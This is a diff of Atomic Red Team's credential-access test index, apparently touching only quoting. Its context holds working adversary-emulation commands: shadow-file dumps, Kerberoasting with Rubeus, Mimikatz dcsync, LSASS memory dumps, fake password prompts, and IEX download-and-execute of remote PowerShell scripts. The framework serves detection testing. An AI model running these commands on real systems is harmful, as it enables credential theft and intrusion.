a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -61,7 +61,7 @@ credential-access: cat #{output_file} cleanup_command: 'rm -f #{output_file} -' + ' name: bash elevation_required: true - name: Access /etc/passwd (Local) @@ -80,13 +80,13 @@ credential-access: cat #{output_file} cleanup_command: 'rm -f #{output_file} -' + ' name: sh - name: Access /etc/{shadow,passwd} with a standard bin that's not cat auto_generated_guid: df1a55ae-019d-4120-bc35-94f4bc5c4b0a description: 'Dump /etc/passwd and /etc/shadow using ed -' + ' supported_platforms: - linux input_arguments: @@ -97,17 +97,17 @@ credential-access: executor: command: 'echo -e "e /etc/passwd\n,p\ne /etc/shadow\n,p\n" | ed > #{output_file} -' + ' cleanup_command: 'rm -f #{output_file} -' + ' name: bash elevation_required: true - name: Access /etc/{shadow,passwd} with shell builtins auto_generated_guid: f5aa6543-6cb2-4fae-b9c2-b96e14721713 description: 'Dump /etc/passwd and /etc/shadow using bash builtins -' + ' supported_platforms: - linux input_arguments: @@ -122,7 +122,7 @@ credential-access: testcat /etc/shadow > #{output_file} cleanup_command: 'rm -f #{output_file} -' + ' name: bash elevation_required: true T1557.002: @@ -313,32 +313,32 @@ credential-access: dependencies: - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' - description: 'Rubeus must exist -' + ' prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable} -' + ' executor: command: 'cmd.exe /c "#{local_folder}\#{local_executable}" asreproast /outfile:"#{local_folder}\#{out_file}" -' + ' cleanup_command: 'Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore -' + ' name: powershell elevation_required: false T1552.003: @@ -393,7 +393,7 @@ credential-access: description: 'Search through bash history for specifice commands we want to capture -' + ' supported_platforms: - linux - macos @@ -415,7 +415,7 @@ credential-access: command: 'cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file} -' + ' name: sh T1110: technique: @@ -650,7 +650,7 @@ credential-access: pod service account, for example) can access sensitive information that might include credentials to various services. -' + ' supported_platforms: - containers input_arguments: @@ -661,17 +661,17 @@ credential-access: dependencies: - description: 'kubectl must be installed -' + ' get_prereq_command: 'echo "kubectl must be installed manually" -' + ' prereq_command: 'which kubectl -' + ' executor: command: 'kubectl get secrets -n #{namespace} -' + ' name: bash elevation_required: false - name: Cat the contents of a Kubernetes service account token file @@ -679,7 +679,7 @@ credential-access: description: 'Access the Kubernetes service account access token stored within a container in a cluster. -' + ' supported_platforms: - linux dependency_executor_name: sh @@ -687,24 +687,24 @@ credential-access: - description: Verify docker is installed. prereq_command: 'which docker -' + ' get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi -' + ' - description: Verify docker service is running. prereq_command: 'sudo systemctl status docker -' + ' get_prereq_command: 'sudo systemctl start docker -' + ' - description: Verify kind is in the path. prereq_command: 'which kind -' + ' get_prereq_command: | curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64 chmod +x ./kind @@ -712,14 +712,14 @@ credential-access: - description: Verify kind-atomic-cluster is created prereq_command: 'sudo kind get clusters -' + ' get_prereq_command: 'sudo kind create cluster --name atomic-cluster -' + ' - description: Verify kubectl is in path prereq_command: 'which kubectl -' + ' get_prereq_command: | curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl" chmod +x ./kubectl @@ -727,19 +727,19 @@ credential-access: - description: Verify atomic-pod is running. prereq_command: 'kubectl --context kind-atomic-cluster get pods |grep atomic-pod -' + ' get_prereq_command: 'kubectl --context kind-atomic-cluster run atomic-pod --image=alpine --command -- sleep infinity -' + ' executor: command: 'kubectl --context kind-atomic-cluster exec atomic-pod -- cat /run/secrets/kubernetes.io/serviceaccount/token -' + ' name: sh cleanup_command: 'kubectl --context kind-atomic-cluster delete pod atomic-pod -' + ' T1056.004: technique: external_references: @@ -841,7 +841,7 @@ credential-access: auto_generated_guid: de1934ea-1fbf-425b-8795-65fb27dd7e33 description: 'Hooks functions in PowerShell to read TLS Communications -' + ' supported_platforms: - windows input_arguments: @@ -857,10 +857,10 @@ credential-access: dependencies: - description: 'T1056.004x64.dll must exist on disk at specified location (#{file_name}) -' + ' prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll" -OutFile "#{file_name}" -UseBasicParsing @@ -946,7 +946,7 @@ credential-access: description: 'Using username,password combination from a password dump to login over SSH. -' + ' supported_platforms: - linux input_arguments: @@ -958,16 +958,16 @@ credential-access: dependencies: - description: 'Requires SSHPASS -' + ' prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo apt install sshpass -y; else echo "This test requires sshpass" ; fi ; -' + ' executor: name: bash elevation_required: false @@ -979,7 +979,7 @@ credential-access: description: 'Using username,password combination from a password dump to login over SSH. -' + ' supported_platforms: - macos input_arguments: @@ -991,11 +991,11 @@ credential-access: dependencies: - description: 'Requires SSHPASS -' + ' prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: | /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)" brew install hudochenkov/sshpass/sshpass @@ -1091,14 +1091,14 @@ credential-access: executor: command: 'python2 laZagne.py all -' + ' elevation_required: true name: bash - name: Extract passwords with grep auto_generated_guid: bd4cf0d1-7646-474e-8610-78ccf5a097c4 description: 'Extracting credentials from files -' + ' supported_platforms: - macos - linux @@ -1110,14 +1110,14 @@ credential-access: executor: command: 'grep -ri password #{file_path} -' + ' name: sh - name: Extracting passwords with findstr auto_generated_guid: 0e56bf29-ff49-4ea5-9af4-3b81283fd513 description: 'Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed. -' + ' supported_platforms: - windows executor: @@ -1143,7 +1143,7 @@ credential-access: description: 'This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found. -' + ' supported_platforms: - macos - linux @@ -1207,7 +1207,7 @@ credential-access: dependencies: - description: 'Microsoft Word must be installed -' + ' prereq_command: | try { New-Object -COMObject "word.Application" | Out-Null @@ -1218,7 +1218,7 @@ credential-access: get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -1227,7 +1227,7 @@ credential-access: cleanup_command: 'Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction Ignore -' + ' name: powershell - name: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] @@ -1254,7 +1254,7 @@ credential-access: command: 'IEX (IWR ''https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1'' -UseBasicParsing); Get-CredManCreds -Force -' + ' - name: Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials] auto_generated_guid: 36753ded-e5c4-4eb5-bc3c-e8fba236878d @@ -1267,7 +1267,7 @@ credential-access: elevation_required: false command: 'vaultcmd /listcreds:"Windows Credentials" /all -' + ' - name: Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials] auto_generated_guid: bc071188-459f-44d5-901a-f8f2625b2d2e @@ -1280,7 +1280,7 @@ credential-access: elevation_required: false command: 'vaultcmd /listcreds:"Web Credentials" /all -' + ' T1555.003: technique: created: '2020-02-12T18:57:36.041Z' @@ -1392,11 +1392,11 @@ credential-access: dependencies: - description: 'Modified Sysinternals must be located at #{file_path} -' + ' prereq_command: 'if (Test-Path #{file_path}\SysInternals) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/mitre-attack/attack-arsenal/raw/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/Modified-SysInternalsSuite.zip" -OutFile "#{file_path}\Modified-SysInternalsSuite.zip" @@ -1409,7 +1409,7 @@ credential-access: cleanup_command: 'Remove-Item #{file_path}\Sysinternals -Force -Recurse -ErrorAction Ignore -' + ' name: powershell - name: Search macOS Safari Cookies auto_generated_guid: c1402f7b-67ca-43a8-b5f3-3143abedc01b @@ -1446,10 +1446,10 @@ credential-access: dependencies: - description: 'LaZagne.exe must exist on disk at specified location (#{lazagne_path}) -' + ' prereq_command: 'if (Test-Path #{lazagne_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{lazagne_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe" -OutFile "#{lazagne_path}" @@ -1467,7 +1467,7 @@ credential-access: dependencies: - description: 'Chrome must be installed -' + ' prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1} @@ -1495,7 +1495,7 @@ credential-access: dependencies: - description: 'Opera must be installed -' + ' prereq_command: if (((Test-Path "$env:LOCALAPPDATA\Programs\Opera\launcher.exe") -Or (Test-Path "C:\Program Files\Opera\launcher.exe") -Or (Test-Path "C:\Program Files (x86)\Opera\launcher.exe"))) {exit 0} else {exit 1} @@ -1507,23 +1507,23 @@ credential-access: Stop-Process -Name "opera" - description: 'Opera login data file must exist -' + ' prereq_command: if (Test-Path "$env:APPDATA\Opera Software\Opera Stable\Login Data") {exit 0} else {exit 1} get_prereq_command: 'New-Item -Path "$env:APPDATA\Opera Software\Opera Stable\Login Data" -ItemType File -' + ' executor: name: powershell command: 'Copy-Item "$env:APPDATA\Opera Software\Opera Stable\Login Data" -Destination $env:temp -' + ' cleanup_command: 'Remove-Item -Path "$env:temp\Login Data" -Force -ErrorAction Ignore -' + ' - name: Simulating access to Windows Firefox Login Data auto_generated_guid: eb8da98a-2e16-4551-b3dd-83de49baa14c description: | @@ -1535,7 +1535,7 @@ credential-access: dependencies: - description: 'Firefox must be installed -' + ' prereq_command: if ((Test-Path "C:\Program Files\Mozilla Firefox\firefox.exe") -Or (Test-Path "C:\Program Files (x86)\Mozilla Firefox\firefox.exe")) {exit 0} else {exit 1} @@ -1546,7 +1546,7 @@ credential-access: Start-Process $installer -ArgumentList '/S' -Wait - description: 'Firefox login data file must exist -' + ' prereq_command: if (Test-Path "$env:APPDATA\Mozilla\Firefox\Profiles\") {exit 0} else {exit 1} get_prereq_command: | @@ -1560,7 +1560,7 @@ credential-access: command: 'Copy-Item "$env:APPDATA\Mozilla\Firefox\Profiles\" -Destination $env:temp -Force -' + ' cleanup_command: Remove-Item -Path "$env:temp\Profiles" -Force -ErrorAction Ig T1552.002: @@ -1620,7 +1620,7 @@ credential-access: description: 'Queries to enumerate for credentials in the Registry. Upon execution, any registry key containing the word "password" will be displayed. -' + ' supported_platforms: - windows executor: @@ -1638,7 +1638,7 @@ credential-access: executor: command: 'reg query HKCU\Software\SimonTatham\PuTTY\Sessions /t REG_SZ /s -' + ' name: command_prompt T1003.006: technique: @@ -1755,7 +1755,7 @@ credential-access: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) -' + ' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -1772,7 +1772,7 @@ credential-access: command: '#{mimikatz_path} "lsadump::dcsync /domain:#{domain} /user:#{user}@#{domain}" "exit" -' + ' T1556.001: technique: external_references: @@ -1979,7 +1979,7 @@ credential-access: description: 'This module runs the Windows executable of PetitPotam in order to coerce authentication for a remote system. -' + ' supported_platforms: - windows input_arguments: @@ -2008,11 +2008,11 @@ credential-access: prereq_command: 'if (Test-Path "#{petitpotam_path}") { exit 0 } else { exit 1 } -' + ' get_prereq_command: 'Invoke-WebRequest "https://github.com/topotam/PetitPotam/blob/2ae559f938e67d0cd59c5afcaac67672b9ef2981/PetitPotam.exe?raw=true" -OutFile "#{petitpotam_path}" -' + ' executor: name: powershell elevation_required: false @@ -2161,7 +2161,7 @@ credential-access: to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'' -' + ' name: bash - name: PowerShell - Prompt User for Password auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 @@ -2292,7 +2292,7 @@ credential-access: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) -' + ' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -2370,25 +2370,25 @@ credential-access: dependencies: - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' - description: 'Rubeus must exist -' + ' prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable} -' + ' executor: name: powershell elevation_required: false @@ -2482,26 +2482,26 @@ credential-access: files on the Domain Controller. This value can be decrypted with gpp-decrypt on Kali Linux. -' + ' supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' executor: command: 'findstr /S cpassword %logonserver%\sysvol\*.xml -' + ' name: command_prompt - name: GPP Passwords (Get-GPPPassword) auto_generated_guid: e9584f82-322c-474a-b831-940fd8b4455c @@ -2526,25 +2526,25 @@ credential-access: dependencies: - description: 'Get-GPPPassword PowerShell Script must exist at #{gpp_script_path} -' + ' prereq_command: 'if(Test-Path "#{gpp_script_path}") {exit 0 } else {exit 1 } -' + ' get_prereq_command: | New-Item -ItemType Directory (Split-Path "#{gpp_script_path}") -Force | Out-Null Invoke-WebRequest #{gpp_script_url} -OutFile "#{gpp_script_path}" - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' executor: command: | . #{gpp_script_path} @@ -2717,15 +2717,15 @@ credential-access: dependencies: - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -2760,37 +2760,37 @@ credential-access: description: command flags you would like to run (optional and blank by default) type: String - default: + default: dependency_executor_name: powershell dependencies: - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' - description: 'Rubeus must exist -' + ' prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable} -' + ' executor: command: | klist purge cmd.exe /c "#{local_folder}\#{local_executable}" kerberoast #{flags} /outfile:"#{local_folder}\#{out_file}" cleanup_command: 'Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore -' + ' name: powershell elevation_required: false - name: Extract all accounts in use as SPN using setspn @@ -2810,19 +2810,19 @@ credential-access: dependencies: - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' executor: command: 'setspn -T #{domain_name} -Q */* -' + ' name: command_prompt - name: Request A Single Ticket via PowerShell auto_generated_guid: 988539bc-2ed7-4e62-aec6-7c5cf6680863 @@ -2836,15 +2836,15 @@ credential-access: dependencies: - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' executor: command: "Add-Type -AssemblyName System.IdentityModel\n$ComputerFQDN=$env:LogonServer.trimStart('\\') + \".\" + $env:UserDnsDomain\nNew-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken @@ -2867,15 +2867,15 @@ credential-access: dependencies: - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' executor: command: "Add-Type -AssemblyName System.IdentityModel \nsetspn.exe -T #{domain_name} -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken @@ -3044,7 +3044,7 @@ credential-access: .\T1056.001\src\Get-Keystrokes.ps1 -LogPath #{filepath} cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Living off the land Terminal Input Capture on Linux with pam.d @@ -3063,14 +3063,14 @@ credential-access: dependencies: - description: 'Checking if pam_tty_audit.so is installed -' + ' prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so'' -' + ' get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so and recompile, for this test to work" -' + ' supported_platforms: - linux executor: @@ -3101,14 +3101,14 @@ credential-access: - description: 'This test requires to be run in a bash shell and that logger and tee are installed. -' + ' prereq_command: | if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true @@ -3118,7 +3118,7 @@ credential-access: tail /var/log/syslog cleanup_command: 'unset PROMPT_COMMAND -' + ' - name: Bash session based keylogger auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258 description: "When a command is executed in bash, the BASH_COMMAND variable @@ -3135,14 +3135,14 @@ credential-access: dependencies: - description: 'This test requires to be run in a bash shell -' + ' prereq_command: 'if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi -' + ' get_prereq_command: 'echo "" -' + ' input_arguments: output_file: name: output_file @@ -3158,7 +3158,7 @@ credential-access: cat #{output_file} cleanup_command: 'rm #{output_file} -' + ' - name: SSHD PAM keylogger auto_generated_guid: 81d7d2ad-d644-4b6a-bea7-28ffe43becca description: 'Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. @@ -3166,20 +3166,20 @@ credential-access: of TTY input and capture all keystrokes in a ssh session and place them in the /var/log/audit/audit.log file after the session closes. -' + ' supported_platforms: - linux dependency_executor_name: sh dependencies: - description: 'This test requires sshd and auditd -' + ' prereq_command: | if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi get_prereq_command: 'echo "" -' + ' input_arguments: user_account: description: Basic ssh user account for testing. @@ -3193,7 +3193,7 @@ credential-access: restart auditd\nssh #{user_account}@localhost \nwhoami\nsudo su\nwhoami\nexit\nexit\n" cleanup_command: 'cp -fv /tmp/sshd /etc/pam.d/ -' + ' - name: Auditd keylogger auto_generated_guid: a668edb9-334e-48eb-8c2e-5413a40867af description: "The linux audit tool auditd can be used to capture 32 and 64 bit @@ -3205,14 +3205,14 @@ credential-access: dependencies: - description: 'This test requires sshd and auditd -' + ' prereq_command: 'if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi -' + ' get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true @@ -3221,7 +3221,7 @@ credential-access: $(date +\"%d/%m/%y %H:%M:%S\") \n" cleanup_command: 'systemctl restart auditd -' + ' T1557.001: technique: external_references: @@ -3541,10 +3541,10 @@ credential-access: - description: 'Windows Credential Editor must exist on disk at specified location (#{wce_exe}) -' + ' prereq_command: 'if (Test-Path #{wce_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | $parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip" [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -3584,10 +3584,10 @@ credential-access: - description: 'ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe}) -' + ' prereq_command: 'if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip" @@ -3598,7 +3598,7 @@ credential-access: command: "#{procdump_exe} -accepteula -ma lsass.exe #{output_file}\n" cleanup_command: 'del "#{output_file}" >nul 2> nul -' + ' name: command_prompt elevation_required: true - name: Dump LSASS.exe Memory using comsvcs.dll @@ -3613,10 +3613,10 @@ credential-access: command: 'C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full -' + ' cleanup_command: 'Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Dump LSASS.exe Memory using direct system calls and API unhooking @@ -3639,10 +3639,10 @@ credential-access: - description: 'Dumpert executable must exist on disk at specified location (#{dumpert_exe}) -' + ' prereq_command: 'if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null @@ -3651,7 +3651,7 @@ credential-access: command: "#{dumpert_exe}\n" cleanup_command: 'del C:\windows\temp\dumpert.dmp >nul 2> nul -' + ' name: command_prompt elevation_required: true - name: Dump LSASS.exe Memory using NanoDump @@ -3669,21 +3669,21 @@ credential-access: - description: 'NanoDump executable must exist on disk at specified location ($env:TEMP\nanodump.x64.exe) -' + ' prereq_command: 'if (Test-Path $env:TEMP\nanodump.x64.exe) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/helpsystems/nanodump/raw/84db0c1737bbe027431733c193cfacf59a07259b/compiled/nanodump.x64.exe" -OutFile "$env:TEMP\nanodump.x64.exe" executor: command: '%temp%\nanodump.x64.exe -w "%temp%\nanodump.dmp" -' + ' cleanup_command: 'del "%temp%\nanodump.dmp" >nul 2> nul -' + ' name: command_prompt elevation_required: true - name: Dump LSASS.exe Memory using Windows Task Manager @@ -3726,10 +3726,10 @@ credential-access: dependencies: - description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe}) -' + ' prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href @@ -3739,19 +3739,19 @@ credential-access: Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force - description: 'Lsass dump must exist at specified location (#{input_file}) -' + ' prereq_command: 'cmd /c "if not exist #{input_file} (exit /b 1)" -' + ' get_prereq_command: 'Write-Host "Create the lsass dump manually using the steps in the previous test (Dump LSASS.exe Memory using Windows Task Manager)" -' + ' executor: command: '#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit -' + ' name: command_prompt elevation_required: true - name: LSASS read with pypykatz @@ -3768,35 +3768,35 @@ credential-access: dependencies: - description: 'Computer must have python 3 installed -' + ' prereq_command: | py -3 --version >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'echo "Python 3 must be installed manually" -' + ' - description: 'Computer must have pip installed -' + ' prereq_command: | py -3 -m pip --version >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'echo "PIP must be installed manually" -' + ' - description: 'pypykatz must be installed and part of PATH -' + ' prereq_command: | pypykatz -h >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'pip install pypykatz -' + ' executor: command: 'pypykatz live lsa -' + ' name: command_prompt elevation_required: true - name: Dump LSASS.exe Memory using Out-Minidump.ps1 @@ -3813,7 +3813,7 @@ credential-access: IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump cleanup_command: 'Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Create Mini Dump of LSASS.exe using ProcDump @@ -3841,10 +3841,10 @@ credential-access: - description: 'ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe}) -' + ' prereq_command: 'if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip" Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force @@ -3854,7 +3854,7 @@ credential-access: command: "#{procdump_exe} -accepteula -mm lsass.exe #{output_file}\n" cleanup_command: 'del "#{output_file}" >nul 2> nul -' + ' name: command_prompt elevation_required: true - name: Powershell Mimikatz @@ -3876,7 +3876,7 @@ credential-access: command: 'IEX (New-Object Net.WebClient).DownloadString(''#{remote_script}''); Invoke-Mimikatz -DumpCreds -' + ' name: powershell elevation_required: true - name: Dump LSASS with .Net 5 createdump.exe @@ -3898,15 +3898,15 @@ credential-access: dependencies: - description: 'Computer must have createdump.exe from .Net 5 -' + ' prereq_command: 'if (Test-Path ''#{createdump_exe}'') {exit 0} else {exit 1} -' + ' get_prereq_command: 'echo ".NET 5 must be installed manually." "For the very brave a copy of the executable can be found here: https://github.com/Scoubi/RedTeam-Tools/blob/main/createdump.exe" -' + ' executor: command: | echo "Createdump Path #{createdump_exe}" @@ -3916,7 +3916,7 @@ credential-access: & "#{createdump_exe}" -u -f #{output_file} $ID cleanup_command: 'Remove-Item #{output_file} -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Dump LSASS.exe using imported Microsoft DLLs @@ -3941,10 +3941,10 @@ credential-access: dependencies: - description: 'Computer must have xordump.exe -' + ' prereq_command: 'if (Test-Path ''#{xordump_exe}'') {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe} @@ -3952,7 +3952,7 @@ credential-access: command: "#{xordump_exe} -out #{output_file} -x 0x41\n" cleanup_command: 'Remove-Item #{output_file} -ErrorAction Ignore -' + ' name: powershell elevation_required: true T1557: @@ -4158,19 +4158,19 @@ credential-access: dependencies: - description: 'Target must be a Domain Controller -' + ' prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT -' + ' get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller must be done manually -' + ' executor: command: 'vssadmin.exe create shadow /for=#{drive_letter} -' + ' name: command_prompt elevation_required: true - name: Copy NTDS.dit from Volume Shadow Copy @@ -4197,34 +4197,34 @@ credential-access: dependencies: - description: 'Target must be a Domain Controller -' + ' prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT -' + ' get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller must be done manually -' + ' - description: 'Volume shadow copy must exist -' + ' prereq_command: 'if not exist #{vsc_name} (exit /b 1) -' + ' get_prereq_command: 'echo Run "Invoke-AtomicTest T1003.003 -TestName ''Create Volume Shadow Copy with vssadmin''" to fulfill this requirement -' + ' - description: 'Extract path must exist -' + ' prereq_command: 'if not exist #{extract_path} (exit /b 1) -' + ' get_prereq_command: 'mkdir #{extract_path} -' + ' executor: command: | copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit @@ 